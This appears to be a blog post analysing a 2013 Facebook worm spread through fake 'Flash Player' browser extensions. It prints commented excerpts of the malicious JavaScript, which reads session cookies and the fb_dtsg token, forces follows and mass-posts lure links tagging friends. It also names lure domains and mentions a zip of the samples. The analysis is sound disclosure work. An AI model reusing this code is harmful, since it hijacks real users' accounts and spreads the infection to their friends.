Update 2 – Facebook infection: the fake “Flash Player”

In these days I’ve seen some friends of mine catch a Facebook virus: this virus posts a message with ten friends tagged and a link to a malicious site; the infection, which comes from Turkey (at least on the surface), is OS independent simply because it uses Firefox and Chrome extensions: a fake Flash Player.

The HTML code of the link is shown below:

<!-- link to http://xn--47aaeabb.net/ -->
<a target="_blank" 
onclick="LinkshimAsyncLink.swap(this, &quot;\/l.php?u=http\u00253A\u00252F\u00252Fwww.\u0025D4\u0025A3\u0025D4\u0025A3\u0025D4\u0025A1\u0025D4\u0025A3\u0025D4\u0025A1\u0025D4\u0025A3.net\u00252F&amp;h=SAQHWNf0F&amp;s=1&quot;);" 
onmouseover="LinkshimAsyncLink.swap(this, &quot;http:\/\/www.\u0523\u0523\u0521\u0523\u0521\u0523.net\/&quot;);" rel="nofollow" href="http://www.ԣԣԡԣԡԣ.net/" class="pam shareText">
<div class="attachmentText fsm fwn fcg">
<div data-ft="{&quot;type&quot;:11,&quot;tn&quot;:&quot;C&quot;}" class="uiAttachmentTitle">
<strong>https://www.facebook.com/zuck</strong>
</div>
<span data-ft="{&quot;tn&quot;:&quot;L&quot;}" class="caption">
ԣԣԡԣԡԣ.net
</span>
...

</div></a>

Starting from the first URL, I analyzed the URL flow (the Chrome extension URL is an old one):

Infection URLs flow. Pay attention to the Chrome extension: the URL changes often, but you can recognize the malicious extension by the “from” field, which is “from sosyalaghileleri.com”, as you can see:

fb_zack_chrome_ext

Analyzing the files, as you can see, the extensions act only when the user is on the Facebook site. The main infection file is user.php (it contains JavaScript code):

It takes the Facebook user_id and fb_dtsg values:

// Session identity harvested from the page the extension is injected into:
// the numeric Facebook user id is read from the c_user cookie. The outer
// match() is redundant — it re-matches the cookie string against the digits
// already captured and yields a match array, which later string-concatenates
// to the same id.
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
// Hidden form token copied out of the DOM (the <input name="fb_dtsg"> shown in
// the form excerpt); it is appended to the forged POSTs below, presumably so
// they are accepted as legitimate form submissions. Because the script runs
// inside the facebook.com page itself, both the cookie and this token are
// directly readable — the same-origin policy offers no protection here.
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;

where the Facebook cookie fields are: c_user, locale, act, p, presence, sub; and the fb_dtsg value comes from the Facebook page:

<form id="logout_form" method="post" action="http://www.facebook.com/logout.php"...>
...
<input type="hidden" name="fb_dtsg" value="AQDLusfb" autocomplete="off" />
...
</form>

Then this script makes you follow one or more users:

// "Follow" stage entry point: the victim's session is made to follow an
// attacker-chosen profile id (the digits appear to be redacted by the author).
abone("10000295XSZSZ");

/**
 * Makes the logged-in victim follow a Facebook profile.
 *
 * The request uses a relative URL, so the browser sends it to the current
 * origin (facebook.com) with the victim's session cookies attached; the
 * harvested fb_dtsg token is placed in the body so the POST looks like a
 * genuine form submission. Globals read: fb_dtsg, user_id (set above).
 * No response handler is installed — the result is never checked.
 *
 * @param {string} abone - numeric profile id to follow (the parameter shadows
 *   the function name; "abone" is Turkish for "subscriber").
 */
function abone(abone) {
    var http4 = new XMLHttpRequest();

    // Endpoint and field names copied from Facebook's own follow button:
    // ajaxify="/ajax/follow/follow_profile.php?profile_id=10000295XDXDXD&location=1"
    var url4 = "/ajax/follow/follow_profile.php?__a=1";

    // Body built by raw concatenation, no URL-encoding. subscribed_button_id is a
    // hard-coded value, apparently captured from one page load. Note that
    // "&lsd&__" + user_id emits the id without a key name — the other requests in
    // this file send "&__user=" + user_id — so this is likely a broken __user field.
    var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
    http4.open("POST", url4, true);
    // .... (request headers elided by the author)

    http4.send(params4);
}

Then it does some other things; the most interesting ones happen on Facebook: subscribing to Facebook users and spreading to other accounts in this way: it catches the click event on the Facebook page

// Turkish "tiklama olayini dinle" = "listen for the click event".
// Spreading stage: the first click anywhere on the Facebook page triggers the
// friend harvest and share. It is gated on a "paylasti" (≈ "shared") cookie,
// presumably set elsewhere in user.php (setter not shown): the branch runs only
// while the cookie value contains "hayir" ("no", i.e. not yet shared).
var tiklama = document.addEventListener("click", function () {
    // Throws if the "paylasti" cookie is absent: split(...)[1] is undefined.
    if (document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") &gt;= 0) {
        ...
        arkadaslari_al(); // fetch the friends list and share a message (defined below)
        ...
        // Intended as one-shot removal, but addEventListener returns undefined
        // and removeEventListener needs (type, listener), so this is a no-op;
        // the cookie check is the only thing that stops repeated runs.
        document.removeEventListener(tiklama);
    }
}, false);

and with the arkadaslari_al function, it builds a message tagging ten friends at a time:

// Turkish "arkadaslari al ve isle" = "get the friends and process them".
/**
 * Harvests the victim's friend list and shares the lure post in batches.
 *
 * Calls Facebook's typeahead endpoint (first_degree.php) with the victim's
 * session, parses the reply, then for every group of ten friends builds a
 * tagging string and calls postpaylas() — one share post per ten friends,
 * which matches the "ten friends tagged" symptom described above. Data is
 * handed to postpaylas() through the implicit globals mesaj / mesaj_text;
 * user_id is the global set earlier.
 */
function arkadaslari_al() {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function () {
    if (xmlhttp.readyState == 4) {
        // Facebook prefixes its JSON replies with "for (;;);" (a JSON-hijacking
        // guard); the script strips that prefix and eval()s the rest, leaving
        // the friend list in a global "arkadaslar" ("friends"). replace() with
        // a string argument removes only the first occurrence.
        eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);", "") + ";");
        // One batch of ten friends per iteration. Because of Math.round(), a
        // trailing partial batch of fewer than five friends is never processed.
        for (f = 0; f &lt; Math.round(arkadaslar.payload.entries.length / 10); f++) {
            // Build the tagging text: mesaj carries "@[uid:name]" mention tokens,
            // mesaj_text the plain names. Both are implicit globals (no var).
                mesaj = "";
                mesaj_text = "";
                for (i = f * 10; i &lt; (f + 1) * 10; i++) {
                    if (arkadaslar.payload.entries[i]) { // guards the shorter last batch
                        mesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
                        mesaj_text += " " + arkadaslar.payload.entries[i].text;
                    }
                }
                postpaylas(); // share the lure post tagging this batch
            }

        }

    };
    var params = "&amp;filter[0]=user";
    ....
    params += "&amp;__user=" + user_id;

    // Request the friend list over the same scheme the page was loaded on, so
    // the session cookies are sent either way.
    if (document.URL.indexOf("https://") &gt;= 0) {
        xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true);
    } 
    else {
        xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true);
    }
    xmlhttp.send();
}

And this is the postpaylas function used to share the infection message:

// Turkish "postpaylas" = "share the post".
/**
 * Posts the lure message to the victim's timeline via Facebook's sharer endpoint.
 *
 * Fire-and-forget: the readystate handler is empty, so the response is ignored.
 * Reads the globals mesaj / mesaj_text (built by arkadaslari_al) and user_id,
 * plus page_id / post_id / svn_rev, which must be defined elsewhere in user.php
 * (not shown in this excerpt).
 */
function postpaylas() {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function () {
        if (xmlhttp.readyState == 4) {}
    };

    // Same-scheme request to the sharer endpoint, so the victim's cookies ride along.
    if (document.URL.indexOf("https://") >= 0) {
        xmlhttp.open("POST", "https://www.facebook.com/ajax/sharer/submit_page/?__a=1", true);
    } else {
        xmlhttp.open("POST", "http://www.facebook.com/ajax/sharer/submit_page/?__a=1", true);
    }
// Form body mimicking the native share dialog. Built by raw concatenation
// (no encodeURIComponent), so a friend name containing '&' or '=' would
// corrupt the body.
    var params = "ad_params=";
    params += "&audience[0][value]=80";
    ...
    params += "&message=" + mesaj; // "@[uid:name]" mentions for this batch
    params += "&message_text=" + mesaj_text;
    params += "&reshare=" + page_id // missing semicolon; ASI terminates the statement
    params += "&UIThumbPager_Input=0";
    params += "&attachment[params][0]=" + page_id;
    params += "&attachment[params][1]=" + post_id;
    // Fixed YouTube thumbnail used as the attachment image — a possible
    // indicator for posts generated by this campaign.
    params += "&attachment[params][images][0]=http://i1.ytimg.com/vi/4kr_LlfqEqo/mqdefault.jpg";
    params += "&attachment[type]=99";
    ....
    // The hidden fb_dtsg token is re-read from the DOM at send time.
    params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
    ...
    params += "&__user=" + user_id;
    // Apparently mimics a header Facebook's own client sends; where svn_rev
    // comes from is not shown in this excerpt.
    xmlhttp.setRequestHeader("X-SVN-Rev", svn_rev);
    xmlhttp.send(params);
}

This is the zip in which you can find all the files used by this malware.

Update 2: 03-17-2013

The link used now is facebooksepetim.com, which contains an iframe to http://www.xn--qzbb.tk/, which does the redirect.

Pn